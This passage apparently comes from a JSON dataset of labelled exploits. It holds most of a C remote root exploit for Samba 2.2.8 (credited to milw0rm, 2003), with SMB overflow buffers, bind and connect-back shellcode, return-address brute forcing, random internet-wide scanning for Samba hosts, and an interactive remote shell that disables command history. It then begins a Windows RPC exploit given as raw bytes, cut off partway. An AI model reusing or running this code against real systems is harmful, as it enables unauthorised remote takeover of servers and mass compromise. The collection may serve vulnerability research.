F_SETFL, flags) < 0) {\n\n                close(fd);\n\n                return -1;\n\n        }\n\n        return 1;\n\n}\n\n\n\nint read_timer(int fd, unsigned int time_out)\n\n{\n\n\n\n        /* ripped from no1 */\n\n\n\n        int                      flags;\n\n        int                      select_status;\n\n        fd_set                   fdread;\n\n        struct timeval           timeout;\n\n\n\n        if((flags = fcntl(fd, F_GETFL, 0)) < 0) {\n\n                close(fd);\n\n                return (-1);\n\n        }\n\n\n\n        if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {\n\n                close(fd);\n\n                return (-1);\n\n        }\n\n\n\n        timeout.tv_sec = time_out;\n\n        timeout.tv_usec = 0;\n\n        FD_ZERO(&fdread);\n\n        FD_SET(fd, &fdread);\n\n        select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);\n\n\n\n        if(select_status == 0) {\n\n                close(fd);\n\n                return (-1);\n\n        }\n\n\n\n        if(select_status == -1) {\n\n                close(fd);\n\n                return (-1);\n\n        }\n\n  \n\n        if(FD_ISSET(fd, &fdread)) {\n\n  \n\n                if(fcntl(fd, F_SETFL, flags) < 0) {\n\n                        close(fd);\n\n                        return -1;\n\n                }\n\n                \n\n                return 1;\n\n\n\n        } \n\n        else {\n\n                close(fd);\n\n                return 1;\n\n\n\n        }\n\n}\n\n\n\nint write_timer(int fd, unsigned int time_out)\n\n{\n\n\n\n        /* ripped from no1 */\n\n\n\n        int                      flags;\n\n        int                      select_status;\n\n        fd_set                   fdwrite;\n\n        struct timeval           timeout;\n\n\n\n        if((flags = fcntl(fd, F_GETFL, 0)) < 0) {    \n\n                close(fd);\n\n                return (-1);\n\n        }\n\n\n\n        if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {\n\n                close(fd);\n\n                return (-1);\n\n        }\n\n        \n\n        timeout.tv_sec = time_out;\n\n        timeout.tv_usec = 0;\n\n        FD_ZERO(&fdwrite);\n\n        FD_SET(fd, &fdwrite);\n\n\n\n        select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);\n\n\n\n        if(select_status == 0) {\n\n                close(fd);\n\n                return -1;\n\n        }\n\n\n\n        if(select_status == -1) {\n\n                close(fd);\n\n                return -1;\n\n        }\n\n\n\n        if(FD_ISSET(fd, &fdwrite)) {\n\n                if(fcntl(fd, F_SETFL, flags) < 0) {\n\n                        close(fd);\n\n                        return -1;\n\n                }\n\n                return 1;\n\n        }\n\n        else { \n\n                close(fd);\n\n                return -1;\n\n        }\n\n}\n\n\n\n\n\nvoid shell(int sock)\n\n{\n\n        fd_set  fd_read;\n\n        char buff[1024], *cmd=\"unset HISTFILE; echo \\\"*** JE MOET JE MUIL HOUWE\\\";uname -a;id;\\n\";\n\n        int n;\n\n\n\n        FD_ZERO(&fd_read);\n\n        FD_SET(sock, &fd_read);\n\n        FD_SET(0, &fd_read);\n\n\n\n        send(sock, cmd, strlen(cmd), 0);\n\n\n\n        while(1) {\n\n                FD_SET(sock,&fd_read);\n\n                FD_SET(0,&fd_read);\n\n\n\n                if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;\n\n\n\n                if (FD_ISSET(sock, &fd_read)) {\n\n\n\n                        if((n = recv(sock, buff, sizeof(buff), 0)) < 0){\n\n                                fprintf(stderr, \"EOF\\n\");\n\n                                exit(2);\n\n                        }\n\n\n\n                        if (write(1, buff, n) < 0) break;\n\n                }\n\n\n\n                if (FD_ISSET(0, &fd_read)) {\n\n\n\n                        if((n = read(0, buff, sizeof(buff))) < 0){\n\n                                fprintf(stderr, \"EOF\\n\");\n\n                                exit(2);\n\n                        }\n\n\n\n                        if (send(sock, buff, n, 0) < 0) break;\n\n                }\n\n\n\n                usleep(10);\n\n        }\n\n\n\n        fprintf(stderr, \"Connection lost.\\n\\n\");\n\n        exit(0);\n\n}\n\n\n\nvoid handler()\n\n{\n\n        int sock = 0;\n\n        int i = 0;\n\n        OWNED = 1;\n\n\n\n        for (i = 0; i < 100; i++)\n\n                if (childs[i] != 0xffffffff) waitpid(childs[i], NULL, 0);\n\n\n\n        if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {\n\n                close(sock);\n\n                exit(1);\n\n        }\n\n\n\n        if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {\n\n                fprintf(stdout, \"+ Worked!\\n\"\n\n                                \"--------------------------------------------------------------\\n\");\n\n                shell(sock);\n\n                close(sock);\n\n        }\n\n\n\n\n\n}\n\n\n\nint start_session(int sock)\n\n{\n\n        char buffer[1000];\n\n        char response[4096];\n\n        char session_data1[]    = \"\\x00\\xff\\x00\\x00\\x00\\x00\\x20\\x02\\x00\\x01\\x00\\x00\\x00\\x00\";\n\n        char session_data2[]    = \"\\x00\\x00\\x00\\x00\\x5c\\x5c\\x69\\x70\\x63\\x24\\x25\\x6e\\x6f\\x62\\x6f\\x64\\x79\"\n\n                                  \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x49\\x50\\x43\\x24\";\n\n\n\n        NETBIOS_HEADER  *netbiosheader;\n\n        SMB_HEADER      *smbheader;\n\n\n\n        memset(buffer, 0x00, sizeof(buffer));\n\n\n\n        netbiosheader   = (NETBIOS_HEADER *)buffer;\n\n        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));\n\n\n\n        netbiosheader->type     = 0x00;         /* session message */\n\n        netbiosheader->flags    = 0x00;\n\n        netbiosheader->length   = htons(0x2E);\n\n\n\n        smbheader->protocol[0]  = 0xFF;\n\n        smbheader->protocol[1]  = 'S';\n\n        smbheader->protocol[2]  = 'M';\n\n        smbheader->protocol[3]  = 'B';\n\n        smbheader->command      = 0x73;         /* session setup */\n\n        smbheader->flags        = 0x08;         /* caseless pathnames */\n\n        smbheader->flags2       = 0x01;         /* long filenames supported */\n\n        smbheader->pid          = getpid() & 0xFFFF;\n\n        smbheader->uid          = 100;\n\n        smbheader->mid          = 0x01;\n\n\n\n        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);\n\n\n\n        if(write_timer(sock, 3) == 1)\n\n                if (send(sock, buffer, 50, 0) < 0) return -1;\n\n\n\n        memset(response, 0x00, sizeof(response));\n\n\n\n        if (read_timer(sock, 3) == 1)\n\n                if (read(sock, response, sizeof(response) - 1) < 0) return -1;\n\n\n\n        netbiosheader = (NETBIOS_HEADER *)response;\n\n        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));\n\n\n\n        if (netbiosheader->type != 0x00) fprintf(stderr, \"+ Recieved a non session message\\n\");\n\n\n\n        netbiosheader   = (NETBIOS_HEADER *)buffer;\n\n        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));\n\n\n\n        memset(buffer, 0x00, sizeof(buffer));\n\n\n\n        netbiosheader->type     = 0x00;         /* session message */\n\n        netbiosheader->flags    = 0x00;\n\n        netbiosheader->length   = htons(0x3C);\n\n\n\n        smbheader->protocol[0]  = 0xFF;\n\n        smbheader->protocol[1]  = 'S';\n\n        smbheader->protocol[2]  = 'M';\n\n        smbheader->protocol[3]  = 'B';\n\n        smbheader->command      = 0x70;         /* start connection */\n\n        smbheader->pid          = getpid() & 0xFFFF;\n\n        smbheader->tid          = 0x00;\n\n        smbheader->uid          = 100;\n\n\n\n        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);\n\n\n\n        if(write_timer(sock, 3) == 1)\n\n                if (send(sock, buffer, 64, 0) < 0) return -1;\n\n\n\n        memset(response, 0x00, sizeof(response));\n\n\n\n        if (read_timer(sock, 3) == 1)\n\n                if (read(sock, response, sizeof(response) - 1) < 0) return -1;\n\n\n\n        netbiosheader = (NETBIOS_HEADER *)response;\n\n        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));\n\n\n\n        if (netbiosheader->type != 0x00) return -1;\n\n\n\n        return 0;\n\n}\n\n\n\nint exploit_normal(int sock, unsigned long ret, char *shellcode)\n\n{\n\n\n\n        char buffer[4000];\n\n        char exploit_data[] =\n\n                \"\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n                \"\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\n                \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n                \"\\x00\\x00\\x00\\x90\";\n\n\n\n        int i = 0;\n\n        unsigned long dummy = ret - 0x90;\n\n\n\n        NETBIOS_HEADER  *netbiosheader;\n\n        SMB_HEADER      *smbheader;\n\n\n\n        memset(buffer, 0x00, sizeof(buffer));\n\n\n\n        netbiosheader   = (NETBIOS_HEADER *)buffer;\n\n        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));\n\n\n\n        netbiosheader->type             = 0x00;         /* session message */\n\n        netbiosheader->flags            = 0x04;\n\n        netbiosheader->length           = htons(2096);\n\n\n\n        smbheader->protocol[0]          = 0xFF;\n\n        smbheader->protocol[1]          = 'S';\n\n        smbheader->protocol[2]          = 'M';\n\n        smbheader->protocol[3]          = 'B';\n\n        smbheader->command              = 0x32;         /* SMBtrans2 */\n\n        smbheader->tid                  = 0x01;\n\n        smbheader->uid                  = 100;\n\n\n\n        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);\n\n\n\n        buffer[1096] = 0xEB;\n\n        buffer[1097] = 0x70;\n\n\n\n        for (i = 0; i < 4 * 24; i += 8) {\n\n                memcpy(buffer + 1099 + i, &dummy, 4);\n\n                memcpy(buffer + 1103 + i, &ret,   4);\n\n        }\n\n\n\n        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), \n\n                        exploit_data, sizeof(exploit_data) - 1);\n\n        memcpy(buffer + 1800, shellcode, strlen(shellcode));\n\n\n\n        if(write_timer(sock, 3) == 1) {\n\n                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;\n\n                return 0;\n\n        }\n\n\n\n        return -1;\n\n}\n\n\n\nint exploit_openbsd32(int sock, unsigned long ret, char *shellcode)\n\n{\n\n        char buffer[4000];\n\n\n\n        char exploit_data[] =\n\n                \"\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n                \"\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n                \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n                \"\\x00\\x00\\x00\\x90\";\n\n\n\n        int i = 0;\n\n        unsigned long dummy = ret - 0x30;\n\n        NETBIOS_HEADER  *netbiosheader;\n\n        SMB_HEADER      *smbheader;\n\n\n\n        memset(buffer, 0x00, sizeof(buffer));\n\n\n\n        netbiosheader   = (NETBIOS_HEADER *)buffer;\n\n        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));\n\n\n\n        netbiosheader->type             = 0x00;         /* session message */\n\n        netbiosheader->flags            = 0x04;\n\n        netbiosheader->length           = htons(2096);\n\n\n\n        smbheader->protocol[0]          = 0xFF;\n\n        smbheader->protocol[1]          = 'S';\n\n        smbheader->protocol[2]          = 'M';\n\n        smbheader->protocol[3]          = 'B';\n\n        smbheader->command              = 0x32;         /* SMBtrans2 */\n\n        smbheader->tid                  = 0x01;\n\n        smbheader->uid                  = 100;\n\n\n\n        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);\n\n\n\n        for (i = 0; i < 4 * 24; i += 4)\n\n                memcpy(buffer + 1131 + i, &dummy, 4);\n\n\n\n        memcpy(buffer + 1127, &ret,      4);\n\n\n\n        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),\n\n                        exploit_data, sizeof(exploit_data) - 1);\n\n\n\n        memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));\n\n\n\n        if(write_timer(sock, 3) == 1) {\n\n                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;\n\n                return 0;\n\n        }\n\n\n\n        return -1;\n\n}\n\n\n\n\n\nint main (int argc,char *argv[])\n\n{\n\n        char *shellcode = NULL;\n\n        char scan_ip[256];\n\n\n\n        int brute       = -1;\n\n        int connectback = 0;\n\n        int force       = 0;\n\n        int i           = 0;\n\n        int ip1         = 0;\n\n        int ip2         = 0;\n\n        int ip3         = 0;\n\n        int ip4         = 0;\n\n        int opt         = 0;\n\n        int port        = 139;\n\n        int random      = 0;\n\n        int scan        = 0;\n\n        int sock        = 0;\n\n        int sock2       = 0;\n\n        int status      = 0;\n\n        int type        = 0;\n\n        int verbose     = 0;\n\n\n\n        unsigned long BRUTE_DELAY       = 100000;\n\n        unsigned long ret               = 0x0;\n\n        unsigned long MAX_CHILDS        = 40;\n\n        unsigned long STEPS             = 300;\n\n\n\n        struct hostent          *he;\n\n\n\n        fprintf(stdout, \"samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\\n\"\n\n                        \"--------------------------------------------------------------\\n\");\n\n        \n\n        while((opt = getopt(argc,argv,\"b:B:c:C:d:fp:r:sS:t:v\")) !=EOF) {\n\n                switch(opt) \n\n                {\n\n                        case 'b':\n\n                                brute = atoi(optarg);\n\n                                if ((brute < 0) || (brute > 3)) {\n\n                                        fprintf(stderr, \"Invalid platform.\\n\\n\");\n\n                                        return -1;\n\n                                }\n\n                                break;\n\n                        case 'B':\n\n                                STEPS = atoi(optarg);\n\n                                if (STEPS == 0) STEPS++;\n\n                                break;\n\n                        case 'c':\n\n                                sscanf(optarg, \"%d.%d.%d.%d\", &ip1, &ip2, &ip3, &ip4);\n\n                                connectback = 1;\n\n\n\n                                if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) {\n\n                                        fprintf(stderr, \"Invalid IP address.\\n\\n\");\n\n                                        return -1;\n\n                                }\n\n\n\n                                linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1;\n\n                                linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2;\n\n                                linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3;\n\n                                linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4;\n\n\n\n                                break;\n\n                        case 'C':\n\n                                MAX_CHILDS = atoi(optarg);\n\n                                if (MAX_CHILDS == 0) {\n\n                                        fprintf(stderr, \"Invalid number of childs.\\n\");\n\n                                        return -1;\n\n                                }\n\n\n\n                                if (MAX_CHILDS > 99) {\n\n                                        fprintf(stderr, \"Too many childs, using 99. \\n\");\n\n                                        MAX_CHILDS = 99;\n\n                                }\n\n\n\n                                break;\n\n                        case 'd':\n\n                                BRUTE_DELAY = atoi(optarg);\n\n                                break;\n\n                        case 'f':\n\n                                force = 1;\n\n                                break;\n\n                        case 'p':\n\n                                port = atoi(optarg);\n\n                                if ((port <= 0) || (port > 65535)) {\n\n                                        fprintf(stderr, \"Invalid port.\\n\\n\");\n\n                                        return -1;\n\n                                }\n\n                                break;\n\n                        case 'r':\n\n                                ret = strtoul(optarg, &optarg, 16);\n\n                                break;\n\n                        case 's':\n\n                                random  = 1;\n\n                                scan    = 1;\n\n                                break;\n\n                        case 'S':\n\n                                random  = 0;\n\n                                scan    = 1;\n\n                                sscanf(optarg, \"%d.%d.%d\", &ip1, &ip2, &ip3);\n\n                                ip3--;\n\n                                break;\n\n                        case 't':\n\n                                type = atoi(optarg);\n\n                                if (type == 0 || type > sizeof(targets) / 16) {\n\n                                        for(i = 0; i < sizeof(targets) / 16; i++)\n\n                                                fprintf(stdout, \"%02d. %s  [0x%08x]\\n\", i + 1, targets[i].type, (unsigned int) targets[i].ret);\n\n                                        fprintf(stderr, \"\\n\");\n\n                                        return -1;\n\n                                }\n\n                                break;\n\n                        case 'v':\n\n                                verbose = 1;\n\n                                break;\n\n                        default:\n\n                                usage(argv[0] == NULL ? \"sambal\" : argv[0]);\n\n                                break;\n\n                }\n\n\n\n        }\n\n\n\n        if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0)) \n\n                usage(argv[0] == NULL ? \"sambal\" : argv[0]);\n\n\n\n        if (scan == 1) \n\n                fprintf(stdout, \"+ Scan mode.\\n\");\n\n        if (verbose == 1)\n\n                fprintf(stdout, \"+ Verbose mode.\\n\");\n\n\n\n        if (scan == 1) {\n\n\n\n                srand(getpid());\n\n\n\n                while (1) {\n\n\n\n                        if (random == 1) {\n\n                                ip1 = rand() % 255;\n\n                                ip2 = rand() % 255;\n\n                                ip3 = rand() % 255; } \n\n                        else {\n\n                                ip3++;\n\n                                if (ip3 > 254) { ip3 = 1; ip2++; }\n\n                                if (ip2 > 254) { ip2 = 1; ip1++; }\n\n                                if (ip1 > 254) exit(0);\n\n                        }\n\n\n\n                        for (ip4 = 0; ip4 < 255; ip4++) {\n\n                                i++;\n\n                                snprintf(scan_ip, sizeof(scan_ip) - 1, \"%u.%u.%u.%u\", ip1, ip2, ip3, ip4);\n\n                                usleep(BRUTE_DELAY);\n\n\n\n                                switch (fork()) {\n\n                                        case 0:\n\n                                                switch(is_samba(scan_ip, 2)) {\n\n                                                        case 0:\n\n                                                                fprintf(stdout, \"+ [%s] Samba\\n\", scan_ip);\n\n                                                                break;\n\n                                                        case 1:\n\n                                                                fprintf(stdout, \"+ [%s] Windows\\n\", scan_ip);\n\n                                                                break;\n\n                                                        default:\n\n                                                                break;  \n\n                                                }\n\n\n\n                                                exit(0);\n\n                                                break;\n\n                                        case -1:\n\n                                                fprintf(stderr, \"+ fork() error\\n\");\n\n                                                exit(-1);\n\n                                                break;\n\n                                        default:\n\n                                                if (i > MAX_CHILDS - 2) { \n\n                                                        wait(&status); \n\n                                                        i--;\n\n                                                }\n\n                                                break;\n\n                                }\n\n                        }\n\n\n\n                }\n\n\n\n                return 0;\n\n        }\n\n\n\n\n\n        he = gethostbyname(argv[optind]);\n\n\n\n        if (he == NULL) {\n\n                fprintf(stderr, \"Unable to resolve %s...\\n\", argv[optind]);\n\n                return -1;\n\n        }\n\n\n\n        if (brute == -1) {\n\n\n\n                if (ret == 0) ret = targets[type - 1].ret;\n\n\n\n                shellcode = targets[type - 1].shellcode;\n\n\n\n                if (connectback == 1) {\n\n                        fprintf(stdout, \"+ connecting back to: [%d.%d.%d.%d:45295]\\n\", \n\n                                        ip1, ip2, ip3, ip4);\n\n\n\n                        switch(targets[type - 1].os_type) {\n\n                                case 0: /* linux */\n\n                                        shellcode = linux_connect_back;\n\n                                        break;\n\n                                case 1: /* FreeBSD/NetBSD */\n\n                                        shellcode = bsd_connect_back;\n\n                                        break;\n\n                                case 2: /* OpenBSD */\n\n                                        shellcode = bsd_connect_back;\n\n                                        break;\n\n                                case 3: /* OpenBSD 3.2 Non-exec stack */\n\n                                        shellcode = bsd_connect_back;\n\n                                        break;\n\n                        }\n\n\n\n                }\n\n\n\n                if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {\n\n                        fprintf(stderr, \"+ socket() error.\\n\");\n\n                        return -1;\n\n                }\n\n\n\n                if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {\n\n                        fprintf(stderr, \"+ socket() error.\\n\");\n\n                        return -1;\n\n                }\n\n\n\n                memcpy(&addr1.sin_addr, he->h_addr, he->h_length);\n\n                memcpy(&addr2.sin_addr, he->h_addr, he->h_length);\n\n\n\n                addr1.sin_family = AF_INET;\n\n                addr1.sin_port   = htons(port); \n\n                addr2.sin_family = AF_INET;\n\n                addr2.sin_port   = htons(45295);\n\n\n\n                if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { \n\n                        fprintf(stderr, \"+ connect() error.\\n\");\n\n                        return -1;\n\n                }\n\n\n\n                if (verbose == 1) fprintf(stdout, \"+ %s\\n\", targets[type - 1].type);\n\n\n\n                if (force == 0) {\n\n\n\n                        if (is_samba(argv[optind], 2) != 0) {\n\n                                fprintf(stderr, \"+ Host is not running samba!\\n\\n\");\n\n                                return -1;\n\n                        }\n\n\n\n                        fprintf(stderr, \"+ Host is running samba.\\n\");\n\n                }\n\n\n\n                if (verbose == 1) fprintf(stdout, \"+ Connected to [%s:%d]\\n\", (char *)inet_ntoa(addr1.sin_addr), port);\n\n\n\n                if (start_session(sock) < 0) fprintf(stderr, \"+ Session failed.\\n\");\n\n\n\n                if (verbose == 1) fprintf(stdout, \"+ Session enstablished\\n\");\n\n                sleep(5);\n\n                if (targets[type - 1].os_type != 2) {\n\n                        if (exploit_normal(sock, ret, shellcode) < 0) {\n\n                                fprintf(stderr, \"+ Failed.\\n\");\n\n                                close(sock);\n\n                        }\n\n                } else {\n\n                        if (exploit_openbsd32(sock, ret, shellcode) < 0) {\n\n                                fprintf(stderr, \"+ Failed.\\n\");\n\n                                close(sock);\n\n                        }\n\n                }\n\n\n\n                sleep(2);\n\n\n\n                if (connectback == 0) {\n\n                        if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) {\n\n                                fprintf(stderr, \"+ Exploit failed, try -b to bruteforce.\\n\");\n\n\n\n                                return -1;\n\n                        }\n\n\n\n                        fprintf(stdout, \"--------------------------------------------------------------\\n\");\n\n\n\n                        shell(sock2);\n\n                        close(sock);\n\n                        close(sock2);\n\n                } else {\n\n                        fprintf(stdout, \"+ Done...\\n\");\n\n                        close(sock2);\n\n                        close(sock);\n\n                }\n\n                return 0;\n\n        }\n\n\n\n        signal(SIGPIPE, SIG_IGN);\n\n        signal(SIGUSR1, handler);\n\n\n\n        switch(brute) {\n\n                case 0:\n\n                        if (ret == 0) ret = 0xc0000000;\n\n                        shellcode = linux_bindcode;\n\n                        fprintf(stdout, \"+ Bruteforce mode. (Linux)\\n\");\n\n                        break;\n\n                case 1:\n\n                        if (ret == 0) ret = 0xbfc00000;\n\n                        shellcode = bsd_bindcode;\n\n                        fprintf(stdout, \"+ Bruteforce mode. (FreeBSD / NetBSD)\\n\");\n\n                        break;\n\n                case 2:\n\n                        if (ret == 0) ret = 0xdfc00000;\n\n                        shellcode = bsd_bindcode;\n\n                        fprintf(stdout, \"+ Bruteforce mode. (OpenBSD 3.1 and prior)\\n\");\n\n                        break;\n\n                case 3:\n\n                        if (ret == 0) ret = 0x00170000;\n\n                        shellcode = bsd_bindcode;\n\n                        fprintf(stdout, \"+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\\n\");\n\n                        break;\n\n                }\n\n\n\n        memcpy(&addr1.sin_addr, he->h_addr, he->h_length);\n\n        memcpy(&addr2.sin_addr, he->h_addr, he->h_length);\n\n\n\n        addr1.sin_family = AF_INET;\n\n        addr1.sin_port   = htons(port);\n\n        addr2.sin_family = AF_INET;\n\n        addr2.sin_port   = htons(45295);\n\n\n\n        for (i = 0; i < 100; i++)\n\n                childs[i] = -1;\n\n        i = 0;\n\n\n\n        if (force == 0) {\n\n                if (is_samba(argv[optind], 2) != 0) {\n\n                        fprintf(stderr, \"+ Host is not running samba!\\n\\n\");\n\n                        return -1;\n\n                }\n\n\n\n                fprintf(stderr, \"+ Host is running samba.\\n\");\n\n        }\n\n\n\n        while (OWNED == 0) {\n\n\n\n                if (sock  > 2) close(sock);\n\n                if (sock2 > 2) close(sock2);\n\n\n\n                if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {\n\n                        if (verbose == 1) fprintf(stderr, \"+ socket() error.\\n\");\n\n                }\n\n                else {  \n\n                        ret -= STEPS;\n\n                        i++;\n\n                }\n\n\n\n                if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)\n\n                        if (verbose == 1) fprintf(stderr, \"+ socket() error.\\n\");\n\n\n\n\n\n                if ((ret & 0xff) == 0x00 && brute != 3) ret++;\n\n\n\n                if (verbose == 1) fprintf(stdout, \"+ Using ret: [0x%08x]\\n\", (unsigned int)ret);\n\n\n\n                usleep(BRUTE_DELAY);\n\n\n\n                switch (childs[i] = fork()) {\n\n                        case 0:\n\n                                if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) {\n\n                                        if (sock  > 2) close(sock);\n\n                                        if (sock2 > 2) close(sock2);\n\n                                        exit(-1);\n\n                                }\n\n\n\n                                if(write_timer(sock, 3) == 1) {\n\n                                        if (start_session(sock) < 0) {\n\n                                                if (verbose == 1) fprintf(stderr, \"+ Session failed.\\n\");\n\n                                                if (sock  > 2)close(sock);\n\n                                                if (sock2 > 2) close(sock2);\n\n                                                exit(-1);\n\n                                        }\n\n\n\n                                        if (brute == 3) {\n\n                                                if (exploit_openbsd32(sock, ret, shellcode) < 0) {\n\n                                                        if (verbose == 1) fprintf(stderr, \"+ Failed.\\n\");\n\n                                                        if (sock  > 2) close(sock);\n\n                                                        if (sock2 > 2) close(sock2);\n\n                                                        exit(-1);\n\n                                                }\n\n                                        } \n\n                                else {\n\n                                        if (exploit_normal(sock, ret, shellcode) < 0) {\n\n                                                if (verbose == 1) fprintf(stderr, \"+ Failed.\\n\");\n\n                                                if (sock  > 2) close(sock);\n\n                                                if (sock2 > 2) close(sock2);\n\n                                                exit(-1);\n\n                                        }\n\n\n\n                                        if (sock > 2) close(sock);\n\n\n\n                                        if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {\n\n                                                if (sock2 > 2) close(sock2);\n\n                                                exit(-1);\n\n                                        }\n\n\n\n                                        if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {\n\n                                                if (sock2  > 2) close(sock2);\n\n                                                kill(getppid(), SIGUSR1);\n\n                                        }\n\n\n\n                                        exit(1);\n\n                                }\n\n\n\n\n\n                                exit(0);\n\n                                break;\n\n                        case -1:\n\n                                fprintf(stderr, \"+ fork() error\\n\");\n\n                                exit(-1);\n\n                                break;\n\n                        default:\n\n                                if (i > MAX_CHILDS - 2) {\n\n                                        wait(&status);\n\n                                        i--;\n\n                                }\n\n                                break;\n\n                        }\n\n\n\n                }\n\n\n\n        }\n\n\n\n        return 0;\n\n}\n\n\n\n// milw0rm.com [2003-04-10]",
10        "vulnerable": true
11    },
12    {
13        "exploit_id": 100,
14        "content": "#include <stdio.h>\n\n#include <winsock2.h>\n\n#include <windows.h>\n\n#include <process.h>\n\n#include <string.h>\n\n#include <winbase.h>\n\n\n\n#pragma comment(lib,\"ws2_32\")\n\n\n\nunsigned char bindstr[]={\n\n0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,\n\n0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,\n\n0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,\n\n0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,\n\n0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};\n\n\n\nunsigned char request1[]={\n\n0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03\n\n,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00\n\n,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45\n\n,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E\n\n,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D\n\n,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41\n\n,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00\n\n,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45\n\n,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00\n\n,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29\n\n,0xCD,0x00,0x00,0x00,0x00,0